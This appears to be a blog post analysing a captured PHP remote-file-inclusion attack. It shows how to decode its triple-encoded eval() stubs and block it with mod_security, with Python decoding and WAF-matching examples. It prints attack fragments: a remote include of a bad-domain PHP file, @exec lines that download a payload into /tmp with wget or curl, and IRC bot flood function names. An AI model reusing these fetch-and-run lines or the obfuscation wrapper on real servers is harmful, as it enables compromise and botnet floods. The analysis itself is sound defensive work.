
PHP – decoding ‘gzinflate(str_rot13(base64_decode’ hack attempts

By Dale Reagan | April 9, 2012

A recent ‘alarm’ about RFI (remote file inclusion) ‘attacks’ against PHP-coded web sites (i.e. any WordPress site) got me curious about some of my log messages. In this case the web server/PHP application were not compromised, thanks to a somewhat guarded server configuration. The configuration also ‘captured’ the triple-encoded attack code (some excerpts below).

When you first look at this it’s simply ‘a mess’ due to the triple encoding.

When you review these types of POST attempts you will see ‘eval’ calls in front of the encoded strings; had the code been executed, the ‘eval’ would have ‘run the code’. The following lines are from a single recent attempt (note that the lines have been randomly clipped and spaces have been introduced):

eval (base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0K
eval (base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lz
eval (in cl ude('http://www.SOME_BAD_DOMAIN. com%2Fmods%2F%2Fbt.php;))
eval (gzinflate(str_rot13(base64_decode('7Rz9SuM28ufsXyHcvL6kG

So how do you decode this stuff? (‘gzinflate(str_rot13(base64_decode’)

Decode-Via-Echo: the simplest method is to replace the ‘eval’ calls with ‘echo’ so that the decoded data is ‘printed’ instead of executed. Note that the examples above are ‘snippets’ and that you must use a CLI version of PHP for the simple decode examples to work. The first two lines decode to PHP code and HTML code. The third line was not encoded at all; it is an attempt to include PHP code from a ‘bad’ web server. The fourth line can only be decoded if you include the entire base64-encoded string.

php -r "echo base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0K');"
OUTPUT:  if(function_exists('exec')){
php -r "echo base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lz');"
OUTPUT: echo "Some_Hackers_Sig_Code<br>";
php -r "echo gzinflate(str_rot13(base64_decode('7Rz9SuM28ufsXyHcvL6kG')));"
The above line will 'fail' since gzinflate() needs the entire 'gzipped' string - so
make sure to include the entire encoded string if you try the 'decode via echo' approach...
(The one-liners use double quotes around the PHP so that the single quotes inside base64_decode() survive the shell.)

Once you confirm that the above decoding approach works you can script it. A ‘scripted’ version/example follows – save it as a file (e.g. /tmp/test-bad.php) and then run it with ‘php /tmp/test-bad.php’:

<?php
// Same two snippets as the one-liners above; echo prints the decoded text, nothing is executed.
echo (base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0K'));
echo (base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lz'));
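As an added example (my own code, not the post’s), here is the same decode-without-eval approach in Python, for unwrapping a captured sample on an analysis box that has no PHP installed. It mirrors PHP’s gzdeflate/gzinflate (raw DEFLATE, no zlib or gzip header) and str_rot13 (ASCII letters only), round-trips a constructed sample string through the three layers, and returns None for a clipped blob like the fourth line above instead of guessing at the missing bytes. The sample code string, the stub regex and the function names are assumptions of mine.

```python
import base64
import codecs
import re
import zlib

# Constructed sample "attacker code"; it is only ever decoded here, never executed.
SAMPLE_CODE = b'if(function_exists("exec")){ echo "constructed sample"; }'

# Matches the eval(gzinflate(str_rot13(base64_decode('...')))) stub shape from the post.
# The closing quote is deliberately not required so that clipped log lines still
# reach the decode step and fail there rather than silently not matching.
STUB_RE = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*str_rot13\s*\(\s*base64_decode\s*\(\s*'([A-Za-z0-9+/=]+)"
)


def php_rot13(data: bytes) -> bytes:
    """Mirror PHP str_rot13(): rotate A-Z/a-z only and leave every other byte alone."""
    return codecs.encode(data.decode("latin-1"), "rot_13").encode("latin-1")


def php_gzdeflate(data: bytes) -> bytes:
    """Mirror PHP gzdeflate(): a raw DEFLATE stream with no zlib or gzip header."""
    comp = zlib.compressobj(level=9, wbits=-15)
    return comp.compress(data) + comp.flush()


def php_gzinflate(data: bytes) -> bytes:
    """Mirror PHP gzinflate(): wbits=-15 tells zlib to expect a raw, headerless stream."""
    return zlib.decompress(data, -15)


def build_payload(code: bytes) -> str:
    """Wrap code the way the stub expects: base64_encode(str_rot13(gzdeflate($code)))."""
    return base64.b64encode(php_rot13(php_gzdeflate(code))).decode("ascii")


def decode_payload(b64: str) -> bytes:
    """Undo the three layers in the order the stub would: base64 -> rot13 -> inflate."""
    return php_gzinflate(php_rot13(base64.b64decode(b64)))


def decode_stub(line: str):
    """Extract the base64 blob from a stub line and decode it without eval().

    Returns None when the line is not that stub or the blob is incomplete,
    which is exactly what happens with the clipped lines shown in the post.
    """
    match = STUB_RE.search(line)
    if not match:
        return None
    try:
        return decode_payload(match.group(1))
    except (ValueError, zlib.error):
        # binascii.Error (bad base64 padding) is a ValueError;
        # zlib.error is raised for a truncated DEFLATE stream.
        return None


if __name__ == "__main__":
    blob = build_payload(SAMPLE_CODE)
    stub = "eval(gzinflate(str_rot13(base64_decode('%s'))));" % blob
    print("stub   :", stub[:70] + "...")
    print("decoded:", decode_stub(stub))
    print("clipped:", decode_stub(stub[:60]))
```

The decode order matters: the stub applies base64_decode first, then str_rot13, then gzinflate, so the encoder has to apply them in reverse. Passing wbits=-15 is the detail most people miss; with the default wbits, zlib expects a header that gzdeflate() never writes and the inflate step fails even on a complete blob.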

In this case the decoded attack code includes a number of functions (as well as whatever code was in the remotely included file, i.e. line 3 above). The beginning of the code attempts to set up a ‘botshell’ environment and includes logic that tries multiple methods to create and fetch files (guessing a bit):

### Start ### - lines have been 'cut/shortened'
@exec("cd /tmp && wget ".$injector." -O
@exec("cd /tmp && fetch -O pb.php ".$injector
@exec("cd /tmp && cUrl -O pb.php ".$injector.
@exec("cd /tmp && lynx -dump ".$injector." pb
@exec("cd /tmp && GET ".$injector.">pb.php &&
@exec("cd /tmp && lwp-download ".$injector."
## snippets below - trying different methods to 'setup' ##
function ex($cfe){

This is followed by a set of self-describing functions:

function start()
function main()
function send($msg)
function join($chan,$key=NULL)
function privmsg($to,$msg)
function notice($to,$msg)
function is_logged_in($host)
function log_in($host)
function log_out($host)
function set_nick() {
function set_ident() {
function udpflood($host,$packetsize,$time) {
function tcpflood($host,$packets,$packetsize,$port,$delay)
function hostinfo() {

Note the presence of ‘flood’ functions – so in this case the code is (most likely) attempting to turn the server into a ‘bot node’.

The config portion of the code includes a domain name (possibly another compromised system) along with a network port and other information:

var $config = array("server"=>"SomeBadDomain . nl",
var $users = array();


How to block/defend against these types of attacks? (RFI)

In this case the attack originated from an IP in Tampa, FL (USA). I will guess that the PC/server at that location is part of the bot-net. Based on the code it appears that the control server is in Europe. Given the history of such bot-nets, chances are that command & control is distributed, so tracking things down would probably require multi-national resources. Ok, sounds like most folks are going to be limited to ‘front-line’ defenses like:

The web server log for this attack was a single line:

  IP_OF_ATTA_CKER - - [08/Apr/2012:15:55:42 -0400] "POST /contact.php HTTP/1.1" 412 2004 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" [55586/11977/2275] [ US/United States/FL/Tampa/813 ]

The ‘412’ response code was due to a WAF rule (mod_security). In this case, the mod_security log entry for this attack was something like:

Message: Access denied with code 5XX (phase 2). Pattern match "(?:\binclude\s*\([^)]*(ht|f)tps?:\/\/)" at ARGS:author_name. [file "rules.conf"] [line "2045"] [id "950118"] [rev "2.2.2"] [msg "Remote File Inclusion Attack"] [severity "CRITICAL"]

The attack used a ‘contact’ form as its path – this suggests taking extra time to review all pages/forms on your site(s) that accept POST requests.
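To show how the WAF rule above catches the request, here is an added example (my own code, not mod_security’s and not the post’s) that URL-decodes a form POST body the way a WAF does before matching ARGS:*, then runs the pattern quoted in the log message over every argument. It adds a second pattern of mine for the encoded eval() stubs decoded earlier in the post. Rule id 950118 and its message come from the log entry above; the "LOCAL-1" id, the sample bodies and the example.invalid host name are constructed placeholders.

```python
import re
from urllib.parse import parse_qs

# Pattern, id and message taken from the mod_security entry quoted above.
RFI_RE = re.compile(r"(?:\binclude\s*\([^)]*(ht|f)tps?:\/\/)", re.IGNORECASE)

# My own additional pattern for the triple-encoded eval() stubs this post decodes;
# it is not part of the ruleset the log entry came from.
OBF_RE = re.compile(
    r"eval\s*\(\s*(?:gzinflate|str_rot13|base64_decode)\s*\(", re.IGNORECASE
)

RULES = [
    ("950118", "Remote File Inclusion Attack", RFI_RE),
    ("LOCAL-1", "Encoded eval() stub", OBF_RE),  # placeholder rule id
]


def scan_post_body(body: str):
    """Decode an application/x-www-form-urlencoded body and test each argument.

    parse_qs undoes the %2F / + encoding first, so an include() whose URL was
    percent-encoded (as in the captured third line) still matches.
    Returns a list of (arg_name, rule_id, msg); an empty list means clean.
    """
    hits = []
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            for rule_id, msg, pattern in RULES:
                if pattern.search(value):
                    hits.append((name, rule_id, msg))
    return hits


# Constructed sample bodies; example.invalid is a reserved, non-routable name.
SAMPLE_BODIES = {
    "clean": "author_name=Dale&comment=Thanks+for+the+post",
    "rfi": "author_name=eval(include('http%3A%2F%2Fexample.invalid%2Fmods%2Fbt.php'))",
    "obf": "comment=eval(gzinflate(str_rot13(base64_decode('QUJD'))))",
}


if __name__ == "__main__":
    for label, body in SAMPLE_BODIES.items():
        print(label, "->", scan_post_body(body) or "no match")
```

Running this over a saved request body is a quick way to confirm that a rule would have fired without replaying the request against the live site; a plain URL in a comment field (no include( in front of it) stays clean, which is the false-positive case worth checking before deploying a new pattern.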

Simple PHP rot_13, base64_encode, gzinflate examples

<?php
// $my_date was not defined in the original listing; this definition is assumed
// and produces the date format shown in the output below.
$my_date = date('D, d M y H:i:s O');
$my_string = "Compress me - $my_date";
echo "   My String: '$my_string'\n";
$compressed = gzdeflate($my_string);
echo "  Compressed: '$compressed'\n";
$uncompressed = gzinflate($compressed);
echo "Uncompressed: '$uncompressed'\n";
$rot_string = str_rot13($my_string);
echo "       Rot13: '$rot_string'\n";
$un_rot_string = str_rot13($rot_string);
echo "    Un-Rot13: '$un_rot_string'\n";
$b64_string = base64_encode($my_string);
echo "  B64 string: '$b64_string'\n";
$decoded_64_string = base64_decode($b64_string);
echo "  B64 decode: '$decoded_64_string'\n";

The output from the above will vary based on the ‘date’ but it should be similar to:

    My String: 'Compress me - Mon, 09 Apr 12 11:13:24 -0400'
   Compressed: 's��-(J-.V�MU�U����Q0�Tp,(R04R04�24�22Q�5010'
 Uncompressed: 'Compress me - Mon, 09 Apr 12 11:13:24 -0400'
        Rot13: 'Pbzcerff zr - Zba, 09 Nce 12 11:13:24 -0400'
     Un-Rot13: 'Compress me - Mon, 09 Apr 12 11:13:24 -0400'
   B64 string: 'Q29tcHJlc3MgbWUgLSBNb24sIDA5IEFwciAxMiAxMToxMzoyNCAtMDQwMA=='
   B64 decode: 'Compress me - Mon, 09 Apr 12 11:13:24 -0400'

